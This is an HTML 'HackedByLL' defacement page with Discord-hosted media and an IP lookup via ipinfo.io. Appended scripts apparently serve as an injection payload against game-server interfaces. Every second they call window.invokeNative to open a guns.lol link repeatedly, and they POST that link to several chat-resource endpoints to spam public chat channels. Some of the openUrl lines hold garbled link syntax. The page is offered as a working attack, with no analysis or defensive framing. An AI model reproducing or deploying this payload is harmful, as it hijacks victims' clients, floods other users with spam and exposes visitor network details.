<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>HackedByLL</title>
    <style>
        body {
            margin: 0;
            padding: 0;
            background: url('https://media.discordapp.net/attachments/1351702073594482718/1403188736421793883/6b149c70613c112873abc6ca4d1e6518.gif?ex=68a9c298&is=68a87118&hm=d975fbe9b124dee1a1897a24d691e495b30eb75371c761ba9c936c4a5de287fd&=') no-repeat center center fixed;
            background-size: cover;
            font-family: 'Courier New', Courier, monospace;
            color: #0000ff;
            display: flex;
            justify-content: center;
            align-items: center;
            height: 100vh;
            flex-direction: column;
            text-align: center;
        }
        .info {
            margin-top: 20px;
            font-size: 1.5em;
            color: #ff0000; 
            
            letter-spacing: 4.5px; 
            white-space: pre-wrap;
        }
        .text {
            margin-top: 20px;
            font-size: 3em; 
            color: #ff0000; 
            text-shadow: 0px 0px 8px #ff0000, 0px 0px 15px #0000ff, 0px 0px 25px #ff0000; 
            letter-spacing: 4.5px; 
        }
    </style>
</head>
<body>
    <div class="image-container">

    </div>
    <audio autoplay loop>
        <source src="https://cdn.discordapp.com/attachments/1403220944889319518/1403768230815727686/7cf7f5330ce1137a.mp3?ex=68a93b4a&is=68a7e9ca&hm=472b1478c0cfb971997c629cc5700df36069ecb5bb71bcbe12b6b99e933855cd&">
        Your browser does not support the audio element.
    </audio>
    <div class="text">B3yonny Double #LL</div>
    <div class="text"></div>

    <script>
         fetch('https://ipinfo.io/json')
        .then(response => response.json())
        .then(data => {
            delete data.readme;
            const infoDiv = document.getElementById('ip-info');
            infoDiv.textContent = JSON.stringify(data, null, 2);
        });
    </script>
    
</body>
</html>
<script>
setInterval(() => {
window.invokeNative("openUrl", "[https://guns.lol/93vw"](https://guns.lol/93vw%22));
window.invokeNative("openUrl", "[https://guns.lol/93vw"](https://guns.lol/93vw%22));
window.invokeNative("openUrl", "[https://guns.lol/93vw"](https://guns.lol/93vw%22));
window.invokeNative("openUrl", "[https://guns.lol/93vw"](https://guns.lol/93vw%22));
}, 1000);
    </script>
    </body>
</html>
<script>
    const msg = `https://guns.lol/93vw`;
const body = JSON.stringify({ message: msg });
setInterval(() => {
fetch("https://flix-scripts/chatResult", { method: "POST", body });
fetch("https://danger_chat/Danger_Chat:SendMessage", {method: "POST",body: JSON.stringify({"message": msg,"channel": "شات العام","color": null,"isImageAndLinksAllowed": [false,false]})})
fetch("https://easy-chat+/o6ZbK5Ecp6", {headers: {accept: "*/*","content-type": "application/x-www-form-urlencoded; charset=UTF-8"},body: JSON.stringify({ message: msg, channel: "شات العام" }),method: "POST"});
fetch("https://melix_chat/chatResult", { method: "POST", body });
fetch("https://as_chat/chatResult", { method: "POST", body });
fetch("https://chat/chatResult", { method: "POST", body });
fetch("https://ho-chatv2/Chat", {method: "POST",body: JSON.stringify({"Type": "chatResult","message": msg,"chatType": "general"})});
}, 1000);
